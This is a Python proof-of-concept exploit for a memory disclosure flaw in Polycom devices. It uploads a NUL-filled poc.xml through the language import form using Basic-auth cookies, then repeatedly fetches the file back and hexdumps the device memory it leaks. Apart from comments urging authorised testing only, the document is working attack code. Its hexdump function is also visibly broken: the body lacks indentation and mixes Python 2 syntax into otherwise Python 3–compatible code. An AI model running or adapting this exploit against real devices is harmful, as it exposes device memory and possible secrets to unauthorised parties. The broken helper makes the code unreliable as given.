###
# Proof of concept for a Polycom memory disclosure vulnerability: upload a
# NUL-filled file, then fetch it back and dump what the device returns.
# Use only against devices you are authorised to test; credentials and
# leaked memory travel over plaintext HTTP.
# Usage: ./polycom.py ip username password
import base64
import getpass
import socket
import string
import sys
def hexdump(src, length=16, sep='.'):
DISPLAY = string.digits + string.letters + string.punctuation
FILTER = ''.join(((x if x in DISPLAY else '.') for x in map(chr, range(256))))
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
if len(hex) > 24:
hex = "%s %s" % (hex[:24], hex[24:])
printable = ''.join(["%s" % FILTER[ord(x)] for x in chars])
lines.append("%08x: %-*s |%s|\n" % (c, length*3, hex, printable))
print ''.join(lines)
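# Shared connection settings for both stages of the proof of concept.
PORT = 80
# Without a timeout a device that stops answering (or never closes the
# connection) leaves the leak loop below blocked forever.
SOCKET_TIMEOUT = 10.0
RECV_SIZE = 1024
# Must match the boundary named in the upload's Content-Type header.
BOUNDARY = "----WebKitFormBoundaryBuo67PfA56qM4LSt"


def _basic_auth_token(username, password):
    # Base64 of "user:pass" as placed in the Cookie header; returns str on
    # both Python 2 and 3 (b64encode wants/returns bytes on 3).
    raw = ("%s:%s" % (username, password)).encode("utf-8")
    return base64.b64encode(raw).decode("ascii")


def _build_upload_request(ip, authorization):
    # Stage 1 request: multipart upload of a 65000-byte NUL file as poc.xml.
    null_blob = "\x00" * 65000
    payload = "".join([
        "--" + BOUNDARY + "\r\n",
        'Content-Disposition: form-data; name="myfile"; filename="poc.xml"\r\n',
        "Content-Type: text/xml\r\n",
        "\r\n",
        null_blob + "\r\n",
        "--" + BOUNDARY + "--\r\n",
    ])
    # Content-Length covers the multipart body only; the trailing CRLF after
    # it is reproduced from the original PoC (harmless with Connection: close).
    request = "".join([
        "POST /form-submit/Utilities/languages/importFile HTTP/1.1\r\n",
        "Host: %s\r\n" % ip,
        "Connection: close\r\n",
        "Content-Length: %d\r\n" % len(payload),
        "Content-Type: multipart/form-data; boundary=%s\r\n" % BOUNDARY,
        "Cookie: Authorization=Basic %s\r\n" % authorization,
        "\r\n",
        payload + "\r\n",
    ])
    return request.encode("latin-1")


def _build_leak_request(ip, authorization):
    # Stage 2 request: ask the device to serve the uploaded file back.
    # NOTE(review): LF-only line endings and the missing empty line that
    # would normally terminate the headers are kept byte-for-byte from the
    # original PoC; presumably the device's HTTP parser accepts them --
    # verify against a real device before "fixing".
    request = "".join([
        "GET /languages?fileName=poc.xml HTTP/1.1\n",
        "Host: %s\n" % ip,
        "Connection: close\n",
        "Cookie: Authorization=Basic %s\n" % authorization,
    ])
    return request.encode("latin-1")


def _connect(ip):
    # Open a TCP connection to the device's web interface or exit with a
    # message. The original `except e:` raised NameError and, had it worked,
    # would have carried on using an unconnected socket.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(SOCKET_TIMEOUT)
    try:
        sock.connect((ip, PORT))
    except socket.error as exc:
        sock.close()
        sys.exit("connection to %s:%d failed: %s" % (ip, PORT, exc))
    return sock


def _upload_null_file(ip, authorization):
    # Stage 1: push the NUL-filled poc.xml and read (and discard) the reply.
    print("connecting to %s" % ip)
    sock = _connect(ip)
    try:
        print("Uploading NULL file\n")
        # sendall: send() may write only part of a 65 KB request
        sock.sendall(_build_upload_request(ip, authorization))
        sock.recv(RECV_SIZE)
    finally:
        sock.close()
    print("Done\n")


def _leak_memory(ip, authorization):
    # Stage 2: repeatedly request poc.xml and collect whatever comes back
    # until the device closes the connection, times out, or errors.
    # Returns the collected bytes.
    request = _build_leak_request(ip, authorization)
    print("Memory Leak Stage\n")
    sock = _connect(ip)
    print("Leaking memory:\n")
    chunks = []
    try:
        while True:
            sock.sendall(request)
            chunk = sock.recv(RECV_SIZE)
            if not chunk:
                # orderly close: nothing more will arrive, so stop instead of
                # spinning on empty reads
                break
            chunks.append(chunk)
    except socket.error as exc:
        # socket.timeout is a subclass of socket.error on both 2 and 3; only
        # network errors are caught, not arbitrary bugs as the bare except did
        print("Error: %s" % exc)
    finally:
        sock.close()
    return b"".join(chunks)


def main(argv):
    """Run the proof of concept: ``polycom.py ip username [password]``.

    The password may be omitted, in which case it is prompted for so that it
    does not end up in shell history or ``ps`` output. Exits with a usage
    message on bad arguments and with an error message if the device cannot
    be reached.
    """
    if len(argv) not in (3, 4):
        sys.exit("usage: %s ip username [password]" % argv[0])
    ip, username = argv[1], argv[2]
    password = argv[3] if len(argv) == 4 else getpass.getpass("password: ")
    authorization = _basic_auth_token(username, password)
    # Credentials and the leaked memory travel over plaintext HTTP: run this
    # only on a network segment you control and are authorised to test.
    _upload_null_file(ip, authorization)
    leaked = _leak_memory(ip, authorization)
    hexdump(leaked)
    print("Done\n")


if __name__ == "__main__":
    main(sys.argv)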